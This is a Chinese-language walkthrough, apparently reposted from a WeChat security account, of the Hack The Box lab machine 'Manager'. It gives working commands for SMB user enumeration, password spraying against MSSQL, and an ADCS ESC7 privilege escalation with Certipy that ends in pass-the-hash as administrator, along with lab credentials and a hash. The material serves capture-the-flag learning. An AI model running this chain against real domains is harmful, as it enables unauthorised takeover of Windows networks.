点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
信息收集
简单的扫一下端口
nmap -sC -sV 10.10.11.236
开放了很多的端口 先访问一下80端口 看一看有什么功能点
是一个写作网站 但是没有啥功能点 翻看源码也没有子域名什么的 然后进行目录探测
探测到的都是一些静态的页面
然后再去看一下其他的端口 开放了445端口 等等其他可以远程连接的服务端口
爆破用户名
利用 CrackMapExec 工具 通过爆破RID 枚举一下用户名
crackmapexec smb 10.10.11.236 -u guest -p '' --shares --rid-brute 10000
得到了一堆用户名
administrator
guest
krbtgt
dc01
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
爆破密码
然后尝试弱口令 把用户名作为密码进行枚举
之前nmap扫出来的端口 开放了mssql服务 然后尝试一下
crackmapexec mssql 10.10.11.236 -u user.txt -p user.txt --no-brute
成功枚举出来了账户密码
operator:operator
然后利用 impacket包下的工具进入mssql
impacket-mssqlclient manager.htb/operator:[email protected] -windows-auth
提权
进入到mssql之后就开始 提取
直接尝试 xp_cmdshell 命令 发现不能执行 又尝试了其他mssql提权的命令 发现可以执行xp_dirtree
那就翻找一下目录
EXEC xp_dirtree 'C:inetpubwwwroot', 0, 1;
0:这是深度参数,指定遍历目录的深度。0 表示只遍历指定目录本身,不包括其子目录。如果你想遍历子目录,可以使用 1。
1:这是文件类型参数,用于筛选要返回的文件类型。1 表示只返回文件,而不包括子目录。如果你想返回子目录,可以使用 0。
成功发现了一个zip文件 而且就存在于网站下面 直接访问下载下来
找到了raven用户的账户密码
利用 evil-winrm进行登录
evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
成功拿到普通用户的权限
权限提升
这是一台windows靶机 先信息收集一下
发现raven在“Certificate Service DCOM Access”组中,就检查ADCS
利用certipy检测一下ADCS有没有漏洞能打
发现可以用 ESC7 提权
接下来就可以按着GitHub上的大佬文章去做
https://github.com/ly4k/Certipy#esc7
如果您只有访问Manage CA权限,您可以Manage Certificates通过将您的用户添加为新官员来授予自己访问权限。
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
SubCA可以使用参数在 CA 上启用该模板-enable-template。默认情况下,SubCA模板已启用。
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -debug
如果我们已经满足了这次攻击的先决条件,我们可以首先根据模板请求证书SubCA。该请求将被拒绝,但我们将保存私钥并记下请求 ID。
certipy req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn [email protected]
id为23
通过我们的Manage CA和,我们可以使用命令和参数Manage Certificates发出失败的证书请求。
ca-issue-request <request ID>
certipy ca -ca 'manager-DC01-CA' -issue-request 23 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
注意点:
这一步如果报错Got access denied trying to issue certificate 再做一次第一步
最后,我们可以使用req命令和-retrieve <request ID>参数检索颁发的证书。
req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 23
sudo ntpdate -s 10.10.11.236
certipy auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef
拿到root权限
原文始发于微信公众号(SecHub网络安全社区):HTB-Manager
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论